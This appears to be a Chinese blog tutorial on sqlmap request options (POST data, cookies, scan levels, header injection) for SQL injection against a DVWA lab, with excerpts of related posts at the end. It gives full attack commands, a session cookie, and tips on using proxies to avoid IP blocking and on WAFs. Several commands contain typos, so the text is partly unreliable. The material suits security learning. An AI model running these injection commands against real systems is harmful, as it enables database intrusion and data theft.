SQLMAP自動注入(二) REQUEST

2021-07-11 23:51:59 字數 3033 閱讀 7094

資料段: –data

get/post都適用

sqlmap -u 「 –data=」user=1&pass=2」 -f

變數分隔符:–param-del

// ; &

sqlmap -u 「 –data=」q=foo:id=1」 –param-del=」;」 -f

cookie頭: –cookie

web應用需要基於cookie的身份認證

檢查cookie中的注入點(sqlmap自動測試)

登入密碼錯誤,302重定向之前的頁面;

下面再看一下post的提交方法;

root@r:~# sqlmap -u "" --date="page=user-info.php&username=1&password=1&user-info-php-submit-butto=view+account+details" --users
問號去掉,–data=」引數」

因為dvwa是登陸後才能進行sql注入,所以這個時候就應該為sqlmap加上cookie,保證sqlmap登陸到dvwa的頁面,才能模擬滲透;

level 1不會自動掃瞄cookie的漏洞;至少大於等於2;

我們需要在**中加入–level 2這個指令;

dbstcp.stream eq 1會話流1

tcp.stream eq 2會話流2

我們也可以自己指定乙個user-agent;

root@r:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&ssubmit#" --cookie="security=low;phpsheeid=48cr8s0v5420dc62ef81b5af13c6e26e" --host="aaaaaaaaaaaaaaaaaa" -f
檢測host頭必須是level=5;不過這裡一般很少有漏洞資訊;
root@r:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&ssubmit#" --cookie="security=low;phpsheeid=48cr8s0v5420dc62ef81b5af13c6e26e" ----referer="aaaaaaaaaaaaaaaaaa" --level 3 -f
root@r:~# sqlmap -u "http:/192.168.1.121/dvwa/vulnerabilites/sqli/?id=1&ssubmit#" --cookie="security=low;phpsheeid=48cr8s0v5420dc62ef81b5af13c6e26e" ----headers="host:www.abc.com\nuser-agent:bbbbbb\n" -f
指定get方法,也可以post;最好指定,有的**會過濾這個地方;

最好使用**伺服器,防止對真實ip封堵;

找個**,試一下;

有可能被waf保護

sqlmap自動注入 REQUEST

delay 引數 每次http s 請求之間的延遲時間,浮點數,單位為秒,預設無延遲 timeout 引數 請求超時,浮點數,預設為30秒 retries 引數 http s 連線超時重試次數 預設為3次 randomize 引數 長度,型別與原始值保持一致的前提下,指定每次請求隨機取值的引數名 s...

SQL map自動注入,利用工具注入

接下來的演示都在kali內進行,kali自帶sqlmao,在kali裡面的sqlmao工具有很多引數msqlmap hh 詳細檢視,最常用的幾個 u sql注入的url位址 batch 自動化過程 以為方便 一般都會加上這個引數 p 指定引數,指定要注入的引數 這個 應該是登入的,兩個注入點,use...

sqlmap之 二 注入前奏

1.sqlmap支援的注入模式 sqlmap支援五種不同的注入模式 1 基於布林的盲注 即可以根據返回頁面判斷條件真假的注入。2 基於時間的盲注 即不能根據頁面返回內容判斷任何資訊,用條件語句檢視時間延遲語句是否執行 即頁面返回時間是否增加 來判斷。3 基於報錯注入 即頁面會返回錯誤資訊,或者把注入...